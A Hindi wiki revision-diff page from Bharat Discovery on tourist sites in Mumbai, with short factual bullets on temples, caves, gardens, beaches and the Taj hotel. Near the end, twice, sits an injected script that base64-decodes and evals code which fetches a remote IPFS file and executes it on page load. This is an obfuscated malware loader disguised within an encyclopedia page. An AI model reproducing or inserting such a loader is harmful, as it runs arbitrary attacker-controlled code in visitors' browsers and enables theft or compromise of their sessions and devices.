"मुम्बई पर्यटन" के अवतरणों में अंतर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
पंक्ति 30: पंक्ति 30:
 
{{Main|फ्लोरा फाउंटेन मुंबई}}
 
{{Main|फ्लोरा फाउंटेन मुंबई}}
 
*फाउंटेन का नाम [[रोम]] में समृद्धि के [[देवता]] के नाम पर पड़ा था।
 
*फाउंटेन का नाम [[रोम]] में समृद्धि के [[देवता]] के नाम पर पड़ा था।
*अब यह फाउंटेन उस क्षेत्र में है, जहाँ महाराष्ट्र राज्य के लिए शहीद होने वालों की याद में स्मारक बनाया गया है।
+
*अब यह फाउंटेन उस क्षेत्र में है, जहाँ [[महाराष्ट्र]] राज्य के लिए शहीद होने वालों की याद में स्मारक बनाया गया है।
 +
 
 
====<u>जूहू चौपाटी</u>====
 
====<u>जूहू चौपाटी</u>====
 
{{Main|जूहू चौपाटी मुंबई}}
 
{{Main|जूहू चौपाटी मुंबई}}

10:03, 6 अक्टूबर 2010 का अवतरण

मुम्बई मुम्बई पर्यटन मुम्बई ज़िला

मुंबई शहर, भूतपूर्व बंबई, महाराष्ट्र राज्य की राजधानी है। यह दक्षिण-पश्चिम भारत देश का वित्तीय व वाणिज्यिक केंद्र और अरब सागर में स्थित प्रमुख बंदरगाह है। मुंबई दुनिया के विशालतम व सबसे घनी आबादी वाले शहरों में से एक है। मुम्बई को पहले बॉम्बे के नाम से जाना जाता था। मुम्बई शहर को बिजनेस केपिटल ऑफ इंडिया के नाम से भी जाना जाता है। यहाँ देश के प्रमुख वित्तीय और संचार केन्द्र है। भारत का सबसे बड़ा शेयर बाजार, जिसका विश्व में तीसरा स्थान है मुम्बई में ही स्थित है। मुम्बई भारत के पश्चिमी समुद्रतट पर स्थित है। यह अरब सागर के सात द्वीपों का एक हिस्सा है। मुम्बई सामान्य रूप से सात द्वीपों जिनके नाम कोलाबा, माजागाँव, ओल्ड वूमन द्वीप, वाडाला, माहीम, पारेल और माटूंगा-सायन पर स्थित है। सन् 1661 में इंग्लैंड के महाराजा चार्ल्‍स ने पुर्तग़ाल की राजकुमारी कैटरीना डे ब्रिगेंजा से शादी की थी। शादी में दहेज के रूप में चार्ल्‍स को बम्बई शहर मिला था, जो वर्तमान समय में मुम्बई के नाम से जाना जाता है। लेकिन सन् 1668 में मुम्बई ईस्ट इंडिया कम्पनी के हाथों में चला गया। सन् 1868 में महारानी विक्टोरिया ने शहर के प्रशासन को ईस्ट इंडिया कम्पनी से वापस ले लिया। मुंबई पर्यटन के लिए भी विश्व विख्यात हैं। जहाँ लोग दूर-दूर से घूमने के लिए आते है। यहाँ पर कई पर्यटन स्थल है जो इस प्रकार है:-

पर्यटन स्थल

जोगेश्‍वरी गुफ़ा

  • जोगेश्‍वरी की गुफ़ा 1500 साल पुरानी है।
  • जोगेश्‍वरी की गुफ़ा मंदिर में विशाल केंद्रीय हॉल भी है।
  • इसके अतिरिक्त हनुमान, देवी माता, जोगेश्‍वरी और गणेश जी की मूर्तियाँ भी यहाँ स्थित है।

हेंगिग गार्डन

  • हेंगिग गार्डन को फ़िरोजशाह मेहता गार्डन के नाम से भी जाना जाता है।

महालक्ष्मी मंदिर

  • यह मंदिर महालक्ष्मी समुद्र के बिल्कुल करीब स्थित है।
  • इस मंदिर में तीन बहुत ही सुंदर मूर्तियाँ है।
  • मंदिर के गर्भगृह में महालक्ष्मी, महाकाली एवं महासरस्वती तीनों देवियों की प्रतिमाएँ एक साथ विद्यमान हैं।

गेटवे ऑफ़ इंडिया

  • गेटवे आफॅ इंडिया की रूपरेखा जार्ज विककेट ने तैयार की थी और इसका निर्माण किंग जार्ज और क्वीन मैरी ने 1911 में करवाया था।
  • गेटवे ऑफ़ इंडिया मुम्बई का बहुत ही प्रसिद्ध स्थान है।
  • यह अपोलो बंडर के समीप स्थित है।

फ्लोरा फाउंटेन

  • फाउंटेन का नाम रोम में समृद्धि के देवता के नाम पर पड़ा था।
  • अब यह फाउंटेन उस क्षेत्र में है, जहाँ महाराष्ट्र राज्य के लिए शहीद होने वालों की याद में स्मारक बनाया गया है।

जूहू चौपाटी

  • जूहू बीच मुम्बई का सबसे प्रसिद्ध बीच है।
  • यह मुम्बई से तीस किलोमीटर की दूरी पर स्थित है।
  • चौपाटी बीच मारीन ड्राईव में स्थित है। यह जगह मुम्बईवासियों की पहली पंसद है।

हाजी अली दरगाह

माउंट मेरी चर्च

  • माउंट मैरी चर्च मुंबई शहर के विशिष्ट और भव्य चर्चों में से एक है।
  • माउंट मैरी चर्च 1640 में बनाया गया था और फ़िर इसे गिरा दिया गया और 1761 में इसे दुबारा बनाया गया था.।

महालक्ष्मी रेस कोर्स

  • महालक्ष्मी रेस कोर्स महालक्ष्मी समुद्र तट के समीप स्थित है।
  • महालक्ष्मी रेस कोर्स विश्‍व के प्रसिद्ध रेस कोर्स में से एक है।

नेहरू प्लेनेटेरीयम और विज्ञान केन्द्र

  • नेहरू प्लेनेटेरीयम महाराष्ट्र राज्य के मुंबई शहर में स्थित है।
  • नेहरू प्लेनेटेरीयम वर्ली में स्थित है।
  • नेहरू प्लेनेटेरीयम का नाम पंडित जवाहर लाल नेहरू की मृत्यु के बाद रखा गया।

द प्रिंस ऑफ़ वेल्स संग्रहालय

तारापोरवाला एक्वेरियम

  • तारापोरवाला एक्वेरियम महाराष्ट्र राज्य के मुंबई शहर में स्थित है।
  • तारापोरवाला एक्वेरियम में अलग-अलग आकार, प्रकार और रंग की मछलियाँ हैं।

विक्टोरिया गार्डन

  • विक्टोरिया गार्डन महाराष्ट्र राज्य के मुंबई शहर में स्थित है।
  • विक्टोरिया गार्डन वनस्पतिक और प्राणी विज्ञान से सम्बन्धित बगीचा हैं।

एलिफेंटा की गुफाएँ

  • एलिफेंटा की गुफाएँ महाराष्ट्र राज्य के मुंबई शहर से 11 किलोमीटर की दूरी पर स्थित है।
  • एलिफेंटा की गुफाएँ मुम्‍बई महानगर के पास स्थित पर्यटकों का एक बड़ा आकर्षण केन्‍द्र हैं।
  • एलिफेंटा की गुफाएँ को घारापुरी के पुराने नाम से जाना जाता है जो कोंकणी मौर्य की द्वीप राजधानी थी।

एसेल वर्ल्‍ड

  • एसेल वर्ल्‍ड महाराष्ट्र राज्य के मुंबई शहर में स्थित है।
  • एसेल वर्ल्‍ड भारत का सबसे बड़ा मनोरंजन पार्क है।

मुंबा देवी मंदिर

  • मुंबा देवी मंदिर महाराष्ट्र राज्य के मुंबई शहर में स्थित है।
  • मुंबई का नाम ही मराठी में मुंबा आई यानि मुंबा माता के नाम से निकला है।

ताजमहल होटल

  • ताज होटल महाराष्ट्र राज्य के मुंबई शहर में स्थित है।
  • ताज होटल मुंबई के अपोलो बंडर में स्थीत है।
  • ताज महल होटल 104 साल पुरानी इमारत है।
  • ताज होटल में 565 कमरे हैं।
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>